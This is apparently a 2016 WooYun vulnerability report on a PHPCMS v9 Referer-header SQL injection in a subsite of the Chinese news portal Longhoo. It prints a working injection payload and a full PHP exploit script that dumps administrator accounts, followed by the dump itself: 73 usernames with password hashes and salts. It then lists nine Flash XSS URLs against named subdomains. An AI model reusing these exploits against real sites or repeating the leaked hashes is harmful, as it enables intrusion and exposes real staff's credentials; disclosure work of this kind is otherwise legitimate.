当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170471

漏洞标题:龙虎网某分站http-referer注入泄漏73个管理员帐号密码

相关厂商:龙虎网

漏洞作者: 岛云首席鉴黄师

提交时间:2016-01-17 12:32

修复时间:2016-01-22 12:40

公开时间:2016-01-22 12:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

……

详细说明:

问题的根本在PHPCMSv9 的Rerferer注入
EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1

Referer:vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#


经过修改后的http head是这样的

Host: vote.longhoo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=&ltime=1357654307516&rtime=0
Referer:http://vote.longhoo.net’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#


借用独自等待的EXP

<?php
/**
* Created by 独自等待
* User: Hack2012
* Date: 13-2-4 下午8:25
* FileName: phpcmsv9_post_v3.php
* 独自等待博客www.waitalone.cn
*/
print_r('
+------------------------------------------------------+
PHPCMS_V9 poster_click 注入EXP
Site:http://www.waitalone.cn/
Exploit BY: 独自等待
Time:2013-02-19
+------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
');
exit;
}
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
//取得管理员个数
$cmd1 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
//取得管理员表前缀
preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
$tableadmin = $prefix_match[1] . '_admin';
//取得管理员个数
$cmd2 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
$count = $num_match[1];
echo '共有' . $count . '个管理员' . "\n";
//取得管理员用户名及数据
if (preg_match('/Duplicate/', send_pack($cmd2))) {
foreach (range(0, ($count - 1)) as $i) {
$payload = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
if (preg_match('/charset=utf-8/', send_pack($payload))) {
echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
} else {
echo $i . '-->' . $admin_match[1] . "\n";
}
//echo $admin_match[1]. "\n";
//echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
//echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
}
}
} else {
exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}
//提交数据包函数
function send_pack($cmd)
{
global $host, $path;
$data = "GET " . $path . "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n";
$data .= "Host: " . $host . "\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= $cmd . "\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Connection: Close\r\n\r\n";
//这里一定要2个\r\n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '-->' . $errstr;
exit('Could not connect to: ' . $host);
} else {
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
}
fclose($fp);
}
return $back;
}
//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $sec;
}
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?>


7.png


0-->mracale:0840a12ed1161a79cfd7b4b17662bf2c:AAWFSX
1-->chengang:76d79998b544466576c20c57eca10486:Fyy1Ld
2-->zoujiachen:e6ec2a15a109fbb95c702ed4a035bbce:BUXrgv
3-->grk:b0108b640b1dc29d746bcd81a4575f4a:UKTVlF
4-->zxl:4a07f0c4444febc10898f1b4aa773761:jhA7wb
5-->jh:7026f05b81a01e97973ec0fc9c2de530:nM91JM
6-->yuanzong:dc2725f6d79e8e5c777a945e39a9a9d1:AWu4Tt
7-->zy:2be20978700ccf0918f15dda521bec03:xLaTcB
8-->wy:73c59ce21de8f5673ea5e1a61d7bf3e4:If3lwL
9-->hongli:3359bbb23b10fe3c3ed9de77e0199d28:zbY3dg
10-->xueshan:e8f3c711cc4d319573cef3c6c8c441fd:AvXHZa
11-->hl:8ca34a75aaa599b8d7a5cbdd9d1a06c5:bLP1Qv
12-->��ϼ������:907be2ae09e1ecc6221e0265d57c0741:a9YeCF
13-->�ܽ�:8378a8a3181e43cde0ffd0cfcb72e600:92E7bt
14-->wangqianhong:95854cea8dc2d072049b05e0289814d2:ajw7zY
15-->qdh:b205d0afe6ae3f2f6b26204d163fc2ee:Z2gHlP
16-->Ѱ��ˮ�����:e6d2ce17555d4d266af8a8beff0f8fb0:RW5U6G
6G
17-->������:631485a0169818065dea0479bf54c65c:PJUQpV
18-->�ź�:f7265b219b19e4963fa73457b8446c69:rA2iCe
19-->������:f4eecf7d1df6ecd286af521792712247:ZbEWQP
20-->hangcheng:7b0524fcc8d940bb42b506bd5e5ea533:9Yy5YZ
21-->liuyanan:76b62249e280caacdede92843408f539:EDzgfd
22-->lizhen:a5f42a630bec5eef3b9f35d00dba861a:bBuNf2
23-->��ٻ:8c955d13f969cbd36b9a6efaa1cb6999:71J5wY
24-->guorenke:259daa89dc857816c6ccba53fc40d53d:9lMM2r
25-->wangqianhong2:ca65b191e027bf51a4fe90504a5d8f66:Wp8sdM
26-->liyuqin:5e63e4551800d72ef2dc05e3b4fa233d:njxKt6
27-->zhouxian:5c8f654fab2a33da28fe5e466eeaa0a8:MgiJbq
28-->gengtingting:f718ca19593e89f00449fb311f33a772:WwgzWc
29-->��ٻ:4dd7352172130336c6bfa1d28fabc0d4:yMS9EW
30-->�³�:04832a8c57fc833eecb97e8da0d3b3a2:NFfQ74
31-->syj:b4cb5b1d4974121cdfccc7e79548aea7:CvmkLd
32-->qianduan:2bdeba10452c14ef4290a2876839930d:pmlpg8
33-->zhaiyue:11a53bf3e9baaed25f4a52e7e9fcc6fd:lbiuRm
34-->liangqiong:b626b228d8ebaf9c0bb70bbe841f9d4f:sqIfjt
35-->zhuting:570ed3667e6922e73f21f67468a1c509:YFQQMW
36-->zhangzhao:1bf931be0baac03ae7c69805a5c0b703:5wIlIM
37-->zhuxinhui:773435a8df5582a833d0e4ad37ecfd31:KM2Ua1
38-->zhuanglingyan:51a63b6c29c004f83cf432c88c23139b:B33lpe
39-->qianmengmeng:12bad6946f23aa9e848e52b13b2d6820:snxMEj
40-->guzhiming:ee39f1ae2f0094ba4d0a370c4562edf1:UY3fks
41-->suntingting:0b4748c6618c4a2e2216624bdd45fe20:4girVD
42-->gaofei:8fce79e84c3bb0551e649e6b8e8d8904:1qbzqF
43-->yufan:04b6ef433d9120eace216a0b6da267ea:4k4fDt
44-->sunyi:4523d2a8542a7e9149ec6bf321ea7c13:qAyjs1
45-->xushan:fb8f02d39fd89accb1fac4b10b45545e:1HCdsl
46-->chenwenhui:2e7014feae096afcc19e16ea8406c969:CALG1Q
47-->taoyuge:c296bb6e4ad7fb1fd0395e8993a18aaa:A5FK2g
48-->zhangxu:5fd42c0ca21ea1cda71203ad9932a9d8:GYkqhc
49-->huanghui:320e48fd925c472678e95b57f5c9554b:nJ3ChN
50-->libailiang:7e686c8a7c7ef077b5473cdd0cfa9c47:wRj2zG
51-->zhangling:82aa0a317c9f382ecfe920a839234e46:Qc4EZz
52-->liujiajia:ab6a325e51cb59020164e10e46fd7081:8WVSbS
53-->dingjie:be79dd3f20a128f3f5e7a212c38a5f0e:KnLeA8
54-->yanling:13151fdb2fd283c60dfabdf42024a1b9:pEaEll
55-->liujing:ff370dad5022686973c9b27f249638c5:KJpKcA
56-->jiangchuan:cdff938f19de3ebe03d0db03a9b2918e:5Ndh9x
57-->chenjiahui:916032fc35f84cfa5fa080c582c91524:dh4Hh6
58-->shangyan:2a571065b95ba69a43b4ee43f800afd2:9vHRkb
59-->gaojie:829d3ade3b07d03b7d030a636c75d29f:MkhXcJ
60-->sunxiaopei:9a9d68db67cb1a637bb3bba91ef01257:JesIwv
61-->������:dad56073d666ec15b5e3d9353a0c8af7:yjvxsW
62-->huangjianchun:e86a245de0a3c7e51db46a2f831648ea:w41LcU
63-->nieziyi:e3d3fdb2e86ba6366042cc7dc197d124:uqXNy8
64-->sunlu:8a0abb7b87832bc4f45abce6122af417:BZK6dv
65-->test1:d267c4bd5c72df175c57a6c5204d6f92:mzuHyC
66-->��ܲ:a92cef551a1ed5d5e20b2ca9e19822d0:jV3l4Y
67-->��ѩ��:56dad8f550271633cc33ec928cd52074:Zaa4wx
68-->nirui:cd373a403372eb31bf474b2b71fc07de:3k3Szx
69-->dongshu:462844e7f2b18476e4e4b144013bf2e7:6TXAAw
70-->wk:54b72acff0c1fe504e64c1049feab6fb:BVXnFL
71-->�쾧��:45161cd990852f55848e95efb4eef079:pPQI7N
N
72-->��Ե:409e9747ee8f710df9943fd71149e9db:zlrl3T


最后补充几个反射型XSS:

http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss


http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss

漏洞证明:

如上

修复方案:

升级~

版权声明:转载请注明来源 岛云首席鉴黄师@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-22 12:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价